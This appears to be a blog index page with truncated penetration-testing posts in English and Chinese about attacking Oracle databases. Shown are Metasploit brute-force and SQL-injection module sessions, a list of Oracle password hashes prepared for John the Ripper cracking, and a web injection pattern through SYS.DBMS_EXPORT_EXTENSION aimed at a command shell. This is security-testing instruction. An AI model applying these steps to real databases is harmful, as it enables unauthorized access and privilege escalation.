鬼仔's Blog

作者：CG

In some of the past posts I covered finding a user default user account or account with an easy to guess username/password for Oracle and taking that user to DBA via SQL Injection in Oracle packages.

I’ve been neglecting the blog a bit porting some of the public SQLI for Oracle into metasploit auxiliary modules. Not sure when its going to be put into the trunk but it will be at some point, I think MC is working on the mixin to reduce the dependence on the Oracle instantclient.
阅读全文 »

Posted by CG

Thanks to dentonj for pointing out to me their was an Oracle patch for John the Ripper.

I used the john from this site:
http://www.banquise.net/misc/patch-john.html
http://btb.banquise.net/bin/myjohn.tgz

cg@segfault:~/evil/john/run$ more oraclehashes
SCOTT:F894844C34402B67
SYS:E0F3062B9648608A
SYSTEM:7AD9669C7FE693C1
DBSNMP:E066D214D5421CCC
PROD:2E817F456CE5A4EC
TEST:7A0F2B316C212D67
阅读全文 »

Posted by CG

Thank MC for this one…

http://metasploit.com/users/mc/oracle9i/brute_login.rb

msf > use auxiliary/admin/oracle/brute_login
msf auxiliary(brute_login) > set RHOST 172.16.102.130
RHOST => 172.16.102.130
msf auxiliary(brute_login) > info
阅读全文 »

Posted by CG

Sorry no metasploit for this one.

But

I did get asked how to get the SCOTT/TIGER username and pass. I left a (hint) in the first blog post. But by request here is the link:
http://www.petefinnigan.com/default/default_password_checker.htm

Second thing was that you may find yourself with some oracle hashes after some crafty (well not realy) sql queries. Something that probably looks like this:

[*] DBSNMP,E066D214D5421CCC
[*] SCOTT,F894844C34402B67
[*] XDB,88D8364765FCE6AF
阅读全文 »

Posted by CG

Last post we got to where we could execute SQL queries on the box and were able to see Scott’s permissions.

Let’s use the SQLI auxiliary modules to see if we can add the DBA privilege to Scott’s account.

As you recall….

msf auxiliary(oracle_sql) > run

[*] Sending SQL…
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done…
[*] Auxiliary module execution completed
阅读全文 »

Posted by CG

Every so often you come across an open 1521 on a pentest.

1521/tcp open oracle

But what to do? There aren’t a ton of what I consider usable Oracle exploits out there, and the ones that are there involve installing a bunch of extra libraries, and we know thats “tough” to do. Thankfully MC has done all the work for us and created the metasploit mixin and modules. **Need help getting the mixin installed? See my file format post.
阅读全文 »

来源：WEB安全手册

原文发表在黑客手册
犀利的 oracle 注入技术

linx 2008.1.12

介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。

以下的演示都是在web上的sql plus执行的，在web注入时 把select SYS.DBMS_EXPORT_EXTENSION…..改成

/xxx.jsp?id=1 and ‘1’<>’a’||(select SYS.DBMS_EXPORT_EXTENSION…..)

的形式即可。(用” ‘a’|| “是为了让语句返回true值)

语句有点长，可能要用post提交。

以下是各个步骤：
阅读全文 »

作者： kj021320

转载请注明出处

其实 类似ORACLE 这样强大的数据库，真没必要用到这么土的办法

SQLJ   存储过程写文件也可以，逼于无奈对方机器不支持SQLJ  还有  UTL_FILE包也被干掉了？

那 也可以 使用以下我说的这个方式
阅读全文 »